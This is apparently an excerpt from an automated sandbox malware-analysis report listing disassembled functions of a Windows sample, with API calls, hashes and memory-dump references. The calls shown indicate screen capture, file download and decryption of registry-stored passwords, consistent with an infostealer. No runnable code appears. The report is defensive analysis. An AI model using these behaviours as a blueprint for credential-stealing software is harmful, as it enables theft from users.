                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: e8b1177334586ee7d9764f04a69f11d9780d73d0475d3d108f7d8971255e5325
                        • Instruction ID: 62bb393bc3aee82918b16ed19da905d4b212ba0b736fab95c059e513c20c4a84
                        • Opcode Fuzzy Hash: e8b1177334586ee7d9764f04a69f11d9780d73d0475d3d108f7d8971255e5325
                        • Instruction Fuzzy Hash: 9661D1B1F512199FCB12EFB4C989AEE7BBCAF49700F100069E842E7241DB749D458BA1
                        Function 009241E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                        Download Yara Rule
                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00920CF0), ref: 00924276
                        • GetDesktopWindow.USER32 ref: 00924280
                        • GetWindowRect.USER32(00000000,?), ref: 0092428D
                        • SelectObject.GDI32(00000000,00000000), ref: 009242BF
                        • GetHGlobalFromStream.COMBASE(00920CF0,?), ref: 00924336
                        • GlobalLock.KERNEL32(?), ref: 00924340
                        • GlobalSize.KERNEL32(?), ref: 0092434D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                        • String ID:
                        • API String ID: 1264946473-0
                        • Opcode ID: 9eda8efbefd7ac7e34fb6b529e750335b6ce74630015b72fa14f7be67ba61b67
                        • Instruction ID: b4471b4e4ef8fdca56bd34df4fd95714adb1b0094f8a95481c279dbc335eca74
                        • Opcode Fuzzy Hash: 9eda8efbefd7ac7e34fb6b529e750335b6ce74630015b72fa14f7be67ba61b67
                        • Instruction Fuzzy Hash: C5511275A10209AFDB10EFA4ED89AEE77B9EF88300F204519F905E7250DF74AD05CB91
                        Function 0091DFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcat.KERNEL32(?,015EFFD0), ref: 0091E00D
                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0091E037
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091E06F
                        • lstrcat.KERNEL32(?,00000000), ref: 0091E07D
                        • lstrcat.KERNEL32(?,?), ref: 0091E098
                        • lstrcat.KERNEL32(?,?), ref: 0091E0AC
                        • lstrcat.KERNEL32(?,015DA780), ref: 0091E0C0
                        • lstrcat.KERNEL32(?,?), ref: 0091E0D4
                        • lstrcat.KERNEL32(?,015EEEB0), ref: 0091E0E7
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091E11F
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0091E126
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                        • String ID:
                        • API String ID: 4230089145-0
                        • Opcode ID: 425881b9a9f78d7145584f8c7b1dc17e5bac3388d169d95afe0ea523e2bd0473
                        • Instruction ID: bc8e695151bc55dc280e92c0efdbe18b7b8efbcabe0456ddd41ae4b9c44a119c
                        • Opcode Fuzzy Hash: 425881b9a9f78d7145584f8c7b1dc17e5bac3388d169d95afe0ea523e2bd0473
                        • Instruction Fuzzy Hash: F2613E71A1011CAFCB55DB64DD48BDD77B8BF88300F2049A5BA0AA3290DF70AF859F90
                        Function 00906AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 00906AFF
                        • InternetOpenA.WININET(0092CFEC,00000001,00000000,00000000,00000000), ref: 00906B2C
                        • StrCmpCA.SHLWAPI(?,015F0268), ref: 00906B4A
                        • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00906B6A
                        • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00906B88
                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00906BA1
                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00906BC6
                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00906BF0
                        • CloseHandle.KERNEL32(00000000), ref: 00906C10
                        • InternetCloseHandle.WININET(00000000), ref: 00906C17
                        • InternetCloseHandle.WININET(?), ref: 00906C21
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                        • String ID:
                        • API String ID: 2500263513-0
                        • Opcode ID: ab42ad9ce95d580b7e23a7b171047e918f085e22ad66331ae19bcc5a14c5e857
                        • Instruction ID: 6f323266d88da2ed5d3a78951d7f26c3cddbcd867a7e36b0c5ffb22a40a4e623
                        • Opcode Fuzzy Hash: ab42ad9ce95d580b7e23a7b171047e918f085e22ad66331ae19bcc5a14c5e857
                        • Instruction Fuzzy Hash: FA416FB1A40215AFEB24DF64DC89FAE77B9EB44701F104554FA05E71D0EF70AE448BA4
                        Function 0090BBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,0092CFEC), ref: 0090BC1F
                        • lstrlen.KERNEL32(00000000), ref: 0090BC52
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090BC7C
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0090BC84
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0090BCAC
                        • lstrlen.KERNEL32(00934AD4), ref: 0090BD23
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$lstrcat
                        • String ID:
                        • API String ID: 2500673778-0
                        • Opcode ID: b0be0e517ff3944481a20cdbcf286f6965f8a98d0432398590d0a9631ccc02fc
                        • Instruction ID: 2d511756f6cf6b9564102efcf5185083ff79c6f9f768bb76ef437879de0b28fd
                        • Opcode Fuzzy Hash: b0be0e517ff3944481a20cdbcf286f6965f8a98d0432398590d0a9631ccc02fc
                        • Instruction Fuzzy Hash: 3FA16070601205DFDB25DF68D949BAEB7B8AF84304F288469E80AEB2E1DF35DC45CB50
                        Function 00925EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00925F2A
                        • std::_Xinvalid_argument.LIBCPMT ref: 00925F49
                        • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00926014
                        • memmove.MSVCRT(00000000,00000000,?), ref: 0092609F
                        • std::_Xinvalid_argument.LIBCPMT ref: 009260D0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Xinvalid_argumentstd::_$memmove
                        • String ID: invalid string position$string too long
                        • API String ID: 1975243496-4289949731
                        • Opcode ID: 9f6058093bbd9101c0c0de69e01b37cab8f89d20656120cae4525cc1baa8bcc3
                        • Instruction ID: 4e34f9bd04c95670c92e277faf1f05d7d3de2b85a8c59207731b88e534b4934d
                        • Opcode Fuzzy Hash: 9f6058093bbd9101c0c0de69e01b37cab8f89d20656120cae4525cc1baa8bcc3
                        • Instruction Fuzzy Hash: AD61C030700520DBDB28CF5DEDD4AAEB3B6EF84304B254A09E48287789C730ED80DB94
                        Function 0091E049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091E06F
                        • lstrcat.KERNEL32(?,00000000), ref: 0091E07D
                        • lstrcat.KERNEL32(?,?), ref: 0091E098
                        • lstrcat.KERNEL32(?,?), ref: 0091E0AC
                        • lstrcat.KERNEL32(?,015DA780), ref: 0091E0C0
                        • lstrcat.KERNEL32(?,?), ref: 0091E0D4
                        • lstrcat.KERNEL32(?,015EEEB0), ref: 0091E0E7
                        • lstrcpy.KERNEL32(00000000,?), ref: 0091E11F
                        • GetFileAttributesA.KERNEL32(00000000), ref: 0091E126
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$lstrcpy$AttributesFile
                        • String ID:
                        • API String ID: 3428472996-0
                        • Opcode ID: d08ad239b6d5a3c4f55c0702c3f02a871854996115a0587b2e30e871f1507d37
                        • Instruction ID: bccf74ef83275f26d5051f74d93fc49ecb44cbd81cef81c6ee3f6c073a3a0e52
                        • Opcode Fuzzy Hash: d08ad239b6d5a3c4f55c0702c3f02a871854996115a0587b2e30e871f1507d37
                        • Instruction Fuzzy Hash: BF413D71A1011CAFCB25EB68DD49ADD77B8BF88310F1049A5F90A93291DF749F898F90
                        Function 00907A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 009077D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00907805
                          • Part of subcall function 009077D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0090784A
                          • Part of subcall function 009077D0: StrStrA.SHLWAPI(?,Password), ref: 009078B8
                          • Part of subcall function 009077D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 009078EC
                          • Part of subcall function 009077D0: HeapFree.KERNEL32(00000000), ref: 009078F3
                        • lstrcat.KERNEL32(00000000,00934AD4), ref: 00907A90
                        • lstrcat.KERNEL32(00000000,?), ref: 00907ABD
                        • lstrcat.KERNEL32(00000000, : ), ref: 00907ACF
                        • lstrcat.KERNEL32(00000000,?), ref: 00907AF0
                        • wsprintfA.USER32 ref: 00907B10
                        • lstrcpy.KERNEL32(00000000,?), ref: 00907B39
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00907B47
                        • lstrcat.KERNEL32(00000000,00934AD4), ref: 00907B60
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                        • String ID: :
                        • API String ID: 398153587-3653984579
                        • Opcode ID: b38708a3953b8d8a0ce180b58ccb1e4f669caac5ce126149a4529e58085c62f2
                        • Instruction ID: ae092fb5d3415cc3f684c037985dc75add968208c7304c25d31367cbbb605f6c
                        • Opcode Fuzzy Hash: b38708a3953b8d8a0ce180b58ccb1e4f669caac5ce126149a4529e58085c62f2
                        • Instruction Fuzzy Hash: 88319272E04214AFCB14DBA8DC849AFF7B9EB88714F254519F50693290DF74F941CBA1
                        Function 009181B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlen.KERNEL32(00000000), ref: 0091820C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00918243
                        • lstrlen.KERNEL32(00000000), ref: 00918260
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00918297
                        • lstrlen.KERNEL32(00000000), ref: 009182B4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 009182EB
                        • lstrlen.KERNEL32(00000000), ref: 00918308
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00918337
                        • lstrlen.KERNEL32(00000000), ref: 00918351
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00918380
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518067758.0000000000DF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518199051.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1518221819.0000000000F8F000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_900000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: 33c999c8fadc810cc7827bab4aaab2a2553b1d2eaf10587b9557b71a71fa7fd8
                        • Instruction ID: 348ee75077916b187ecdb12d147b7e73cd30f65ad643a7b248c16e30b990e076
                        • Opcode Fuzzy Hash: 33c999c8fadc810cc7827bab4aaab2a2553b1d2eaf10587b9557b71a71fa7fd8
                        • Instruction Fuzzy Hash: 6E517D71A006069FDB14DF68D958AAFB7A8EF40740F154914ED26EB284EF30ED91DBE0
                        Function 009077D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00907805
                        • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0090784A
                        • StrStrA.SHLWAPI(?,Password), ref: 009078B8
                          • Part of subcall function 00907750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0090775E
                          • Part of subcall function 00907750: RtlAllocateHeap.NTDLL(00000000), ref: 00907765
                          • Part of subcall function 00907750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0090778D
                          • Part of subcall function 00907750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 009077AD
                          • Part of subcall function 00907750: LocalFree.KERNEL32(?), ref: 009077B7
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009078EC
                        • HeapFree.KERNEL32(00000000), ref: 009078F3
                        • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00907A35
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                        • Associated: 00000000.00000002.1517531679.0000000000900000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000996000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.00000000009AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517561899.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517755970.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000B4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1517779678.0000000000DB1000.00000040.00000001.01000000.00000003.sdmpDownload File
